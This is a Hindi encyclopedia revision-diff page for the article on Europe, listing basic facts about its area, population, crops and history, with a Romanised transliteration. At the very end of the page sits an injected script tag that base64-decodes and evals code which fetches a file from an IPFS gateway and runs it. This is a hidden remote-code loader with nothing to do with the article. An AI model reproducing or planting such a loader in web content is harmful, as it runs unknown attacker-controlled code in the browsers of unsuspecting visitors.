Difference between revisions of "यूरोप महाद्वीप"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*यूरोप पृथ्वी पर स्थित सात [[महाद्वीप|म...' के साथ नया पन्ना बनाया)
 
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
 +
[[चित्र:Europe.jpg|thumb|200px|यूरोप के विभिन्न दृश्य, यूरोप]]
 
*यूरोप [[पृथ्वी देवी|पृथ्वी]] पर स्थित सात [[महाद्वीप|महाद्वीपों]] में से एक महाद्वीप है। यूरोप, [[एशिया]] से पूरी तरह जुड़ा हुआ है।  
 
*यूरोप [[पृथ्वी देवी|पृथ्वी]] पर स्थित सात [[महाद्वीप|महाद्वीपों]] में से एक महाद्वीप है। यूरोप, [[एशिया]] से पूरी तरह जुड़ा हुआ है।  
 
*यूरोप और एशिया वस्तुतः यूरेशिया के खण्ड हैं और यूरोप यूरेशिया का सबसे पश्चिमी प्रायद्वीपीय खंड है।
 
*यूरोप और एशिया वस्तुतः यूरेशिया के खण्ड हैं और यूरोप यूरेशिया का सबसे पश्चिमी प्रायद्वीपीय खंड है।
 
*यूरोप क्षेत्रफल के आधार पर विश्व का दूसरा सबसे छोटा महाद्वीप है, इसका क्षेत्रफल के 10,180,000 वर्ग किलोमीटर है जो पृथ्वी की सतह का 2 प्रतिशत और इसके भूमि क्षेत्र का लगभग 6.8 प्रतिशत है।
 
*यूरोप क्षेत्रफल के आधार पर विश्व का दूसरा सबसे छोटा महाद्वीप है, इसका क्षेत्रफल के 10,180,000 वर्ग किलोमीटर है जो पृथ्वी की सतह का 2 प्रतिशत और इसके भूमि क्षेत्र का लगभग 6.8 प्रतिशत है।
 +
*यूरोप में असंख प्रकार की अनाज, साग-सब्ज़ियाँ आदि उगाये जाते हैं, किंतु यहाँ चुकन्दर की खेती बहुत बड़ी मात्रा में की जाती है। यही कारण है कि यूरोप चुकन्दर उत्पादन के मामले में प्रथम स्थान पर है।
 
*जनसंख्या के हिसाब से यूरोप, एशिया और अफ्रीका के बाद तीसरा सबसे अधिक आबादी वाला महाद्वीप है।  
 
*जनसंख्या के हिसाब से यूरोप, एशिया और अफ्रीका के बाद तीसरा सबसे अधिक आबादी वाला महाद्वीप है।  
 
*पुरातन काल में यूरोप, विशेष रूप से यूनान पश्चिमी [[संस्कृति]] का जन्मस्थान है। मध्य काल में इसी ने ईसाईयत का पोषण किया है।   
 
*पुरातन काल में यूरोप, विशेष रूप से यूनान पश्चिमी [[संस्कृति]] का जन्मस्थान है। मध्य काल में इसी ने ईसाईयत का पोषण किया है।   
Line 14: Line 16:
 
}}
 
}}
 
==संबंधित लेख==
 
==संबंधित लेख==
{{विदेशी स्थान}}
+
{{महाद्वीप}} {{विदेशी स्थान}}  
[[Category:महाद्वीप]][[Category:भूगोल कोश]][[Category:विदेशी स्थान]]
+
[[Category:विदेशी स्थान]][[Category:महाद्वीप]][[Category:भूगोल कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 07:32, 11 December 2011

thumb|200px|yoorop ke vibhinn drishy, yoorop

  • yoorop prithvi par sthit sat mahadvipoan mean se ek mahadvip hai. yoorop, eshiya se poori tarah ju da hua hai.
  • yoorop aur eshiya vastutah yooreshiya ke khand haian aur yoorop yooreshiya ka sabase pashchimi prayadvipiy khand hai.
  • yoorop kshetraphal ke adhar par vishv ka doosara sabase chhota mahadvip hai, isaka kshetraphal ke 10,180,000 varg kilomitar hai jo prithvi ki satah ka 2 pratishat aur isake bhoomi kshetr ka lagabhag 6.8 pratishat hai.
  • yoorop mean asankh prakar ki anaj, sag-sabziyaan adi ugaye jate haian, kiantu yahaan chukandar ki kheti bahut b di matra mean ki jati hai. yahi karan hai ki yoorop chukandar utpadan ke mamale mean pratham sthan par hai.
  • janasankhya ke hisab se yoorop, eshiya aur aphrika ke bad tisara sabase adhik abadi vala mahadvip hai.
  • puratan kal mean yoorop, vishesh roop se yoonan pashchimi sanskriti ka janmasthan hai. madhy kal mean isi ne eesaeeyat ka poshan kiya hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>